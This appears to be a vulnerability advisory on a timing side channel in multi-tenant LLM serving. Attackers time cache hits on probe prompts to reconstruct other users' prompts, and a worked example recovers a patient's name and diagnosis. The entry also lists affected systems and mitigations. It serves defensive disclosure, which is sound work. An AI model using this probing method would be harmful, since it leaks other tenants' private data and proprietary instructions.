LLM Prefix Cache Reconstruction

Description: Automatic Prefix Caching (APC) in multi-tenant LLM serving systems introduces a timing side-channel vulnerability that permits cross-tenant data leakage. APC shares computed Key-Value (KV) tensors across different users when their requests share identical initial tokens. Because reusing cached tensors is significantly faster than recomputing them, a measurable difference in Time-To-First-Token (TTFT) exists between cache hits and misses. An attacker can exploit this shared cache by sending crafted requests (probes) and observing the TTFT. A lower latency indicates a cache hit, confirming that the attacker's input matches a sequence in another user's prompt. This enables word-by-word prompt stealing and secret reconstruction. The side channel is particularly exploitable under low system load (low requests-per-second), with longer shared prefixes, and on larger model architectures where recomputation costs are high.

Examples: An attacker targets a victim using a known prompt template containing sensitive data.

The victim submits the prompt: Compose a meeting agenda for an interdisciplinary team discussing the treatment plan for [Alice] with [Diabetes].
The attacker uses an LLM-based Prompt Constructor to generate candidate prompts, substituting guesses for the unknown fields (e.g., ...treatment plan for [Bob] with [Cancer], ...treatment plan for [Alice] with [Diabetes]).
The attacker submits these candidates to the shared serving system and measures the TTFT for each.
Requests that miss the cache have a high TTFT. When the attacker submits the correct guess ([Alice] and [Diabetes]), the request hits the shared prefix cache populated by the victim.
The attacker observes a sudden, distinct drop in TTFT, definitively confirming the victim's private information.

Impact: Cross-tenant information disclosure. Attackers can incrementally reconstruct sensitive prompts, extract proprietary instructions, and steal private user data (e.g., PII, medical conditions, financial secrets) from other tenants without requiring direct memory access or specialized privileges.

Affected Systems: Multi-tenant LLM serving frameworks and APIs that implement cross-user Automatic Prefix Caching (APC) or shared KV-caching. Specific systems highlighted include:

vLLM (when APC is enabled)
SGLang
Commercial LLM APIs implementing shared prefix caching across trust boundaries (e.g., OpenAI, DeepSeek, Google Gemini, MoonShot Kimi).

Mitigation Steps:

Selective Prefix Isolation (e.g., CacheSolidarity): Augment the KV cache with metadata (OwnerID and AttackFlag) to track prompt-user interactions. Allow initial cache sharing but isolate continuation paths when a prefix is requested by multiple distinct users, forcing recomputation for non-owners.
User-Level Cache Isolation: Partition the KV cache per user or tenant to disable cross-user prefix sharing entirely. (Note: this mitigates the vulnerability but reduces inference performance).
Increase Cache Block Size: Increase the number of tokens grouped per cache entry. This does not close the channel but severely degrades the attack by forcing the adversary to correctly guess multiple tokens simultaneously rather than brute-forcing one word at a time.
Semantic Cache Isolation (e.g., SafeKV): Deploy an LLM-aided semantic analysis pipeline to identify requests containing sensitive information and selectively isolate only those prompts from the shared cache.
Timing Obfuscation: Inject random noise or pad prefill execution times to make the latency distributions of cache hits and misses statistically indistinguishable to attackers.

LLM Prefix Cache Reconstruction

Research Paper